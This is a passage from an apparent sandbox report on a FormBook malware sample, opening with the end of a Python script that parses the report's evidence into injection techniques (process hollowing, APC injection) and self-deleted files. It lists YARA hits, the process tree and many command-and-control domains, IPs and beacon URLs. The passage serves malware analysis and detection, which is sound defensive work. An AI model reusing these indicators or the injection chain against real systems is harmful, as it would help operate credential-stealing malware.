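_TAIL = r"(?: Jump to behavior)?$"   # link text left over from the HTML export, optional

# (regex, evidence kind); "map" is refined into map_rwx / map_rw by its protection field
_PATTERNS = [
    (re.compile(_SRC + r"Section loaded: unknown target: (?P<tgt>.+?) protection: (?P<prot>.+?)" + _TAIL), "map"),
    (re.compile(_SRC + r"Section unmapped: (?P<tgt>.+?) base address: (?P<base>[0-9A-Fa-f]+)" + _TAIL), "section_unmapped"),
    (re.compile(_SRC + r"Thread APC queued: target process: (?P<tgt>.+?)" + _TAIL), "apc_queued"),
    (re.compile(_SRC + r"Thread register set: target process: (?P<tgt>\d+)" + _TAIL), "thread_context_set"),
    (re.compile(_SRC + r"Process created: (?P<tgt>.+?\.exe)(?: (?P<args>.*?))?" + _TAIL), "process_created"),
]

Pair = Tuple[str, str]


def parse_events(lines: List[str]) -> Tuple[Dict[Pair, Set[str]], Dict[Pair, List[str]]]:
    """Map (source image, target) -> evidence kinds, plus child command lines."""
    events: Dict[Pair, Set[str]] = defaultdict(set)
    cmdlines: Dict[Pair, List[str]] = defaultdict(list)
    for line in lines:
        for rx, kind in _PATTERNS:
            m = rx.match(line.strip())
            if not m:
                continue
            key = (m["src"], m["tgt"])
            if kind == "map":
                kind = "map_rwx" if "execute" in m["prot"] else "map_rw"
            events[key].add(kind)
            if kind == "process_created" and m["args"]:
                cmdlines[key].append(m["args"])
            break
    return events, cmdlines


def classify(evidence: Set[str]) -> str:
    """Name the technique implied by the evidence kinds seen for one pair."""
    if {"section_unmapped", "map_rwx"} <= evidence:
        return "process hollowing (original image unmapped, RWX section mapped in)"
    if "apc_queued" in evidence:
        return "APC injection" + (" into RWX mapped section" if "map_rwx" in evidence else "")
    if "map_rwx" in evidence:
        return "section mapping injection (RWX)"
    if "thread_context_set" in evidence:
        return "thread context modified (sandbox reports the target as a PID only)"
    if "map_rw" in evidence:
        return "RW section mapped (staging, no execute)"
    if "process_created" in evidence:
        return "child process created"
    return "unclassified"


def injection_chain(lines: List[str]) -> List[Tuple[str, str, str]]:
    events, _ = parse_events(lines)
    return sorted((src, tgt, classify(ev)) for (src, tgt), ev in events.items())


def deleted_files(lines: List[str]) -> List[str]:
    """Paths removed through a spawned 'cmd.exe /c del' (self-deletion)."""
    _, cmdlines = parse_events(lines)
    out: List[str] = []
    for (_, child), args in cmdlines.items():
        if child.lower().endswith("cmd.exe"):
            for a in args:
                out += re.findall(r"del '([^']+)'", a)
    return out


if __name__ == "__main__":
    for src, tgt, tech in injection_chain(REPORT_LINES):
        print(f"{src} -> {tgt}: {tech}")
    print("deleted:", deleted_files(REPORT_LINES))
```

The "Thread register set" evidence names PID 3292 from both the sample and rundll32.exe; the page never ties that PID to an image, so the script keeps it as an uncorrelated target instead of guessing it is explorer.exe.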

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED
Behavior Graph ID: 385453 Sample: Design Template.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100

Sample-level DNS/IP nodes: yashasvsaluja.com, www.yashasvsaluja.com, 7 other IPs or domains
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree:
Design Template.exe (started)
    dropped: C:\Users\user\AppData\Local\...\Liebert.bmp, PE32
    Design Template.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected)
            www.2elden.com 156.226.160.56, 49724, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles
            www.landreclaim.com 198.50.252.64, 49725, 80 OVHFR Canada
            13 other IPs or domains
            signature: System process connects to network (likely due to code injection or exploit)
            rundll32.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe (started)
                    conhost.exe (started)

Contacted Public IPs

IP             | Domain                  | Country       | ASN    | ASN Name                                             | Malicious
198.50.252.64  | www.landreclaim.com     | Canada        | 16276  | OVHFR                                                | true
160.153.136.3  | rememberingedward.info  | United States | 21501  | GODADDY-AMSDE                                        | true
34.102.136.180 | bestflowersandgifts.com | United States | 15169  | GOOGLEUS                                             | false
156.226.160.56 | www.2elden.com          | Seychelles    | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS                      | true
47.105.113.141 | www.zq2003.com          | China         | 37963  | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
14.215.190.65  | gz01.bch.baidu-itm.com  | China         | 58466  | CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCN   | true

Contacted Domains

Name                        | IP             | Active
gz01.bch.baidu-itm.com      | 14.215.190.65  | true
yashasvsaluja.com           | 192.0.78.25    | true
bestflowersandgifts.com     | 34.102.136.180 | true
www.realunitystudio.com     | 204.11.56.48   | true
www.zq2003.com              | 47.105.113.141 | true
rememberingedward.info      | 160.153.136.3  | true
www.landreclaim.com         | 198.50.252.64  | true
sexichef.com                | 34.102.136.180 | true
sci-mfg.com                 | 34.102.136.180 | true
betralifcannabis.com        | 34.102.136.180 | true
www.2elden.com              | 156.226.160.56 | true
www.gxjljc.com              | unknown        | unknown
www.betralifcannabis.com    | unknown        | unknown
www.mirgran.com             | unknown        | unknown
www.modomo.amsterdam        | unknown        | unknown
www.bestflowersandgifts.com | unknown        | unknown
www.sexichef.com            | unknown        | unknown
www.yashasvsaluja.com       | unknown        | unknown
www.rememberingedward.info  | unknown        | unknown
www.sci-mfg.com             | unknown        | unknown
www.chuanyangwenhua.com     | unknown        | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.zq2003.com/ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx | true | Avira URL Cloud: safe | unknown
http://www.rememberingedward.info/ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== | true | Avira URL Cloud: safe | unknown
http://www.bestflowersandgifts.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== | false | Avira URL Cloud: safe | unknown
http://www.sexichef.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== | false | Avira URL Cloud: safe | unknown
http://www.landreclaim.com/ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx | true | Avira URL Cloud: safe | unknown
www.zq2003.com/ma3c/ | true | Avira URL Cloud: safe | low
http://www.sci-mfg.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== | false | Avira URL Cloud: safe | unknown
http://www.betralifcannabis.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== | false | Avira URL Cloud: safe | unknown
http://www.chuanyangwenhua.com/ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx | true | Avira URL Cloud: safe | unknown
http://www.2elden.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== | true | Avira URL Cloud: safe | unknown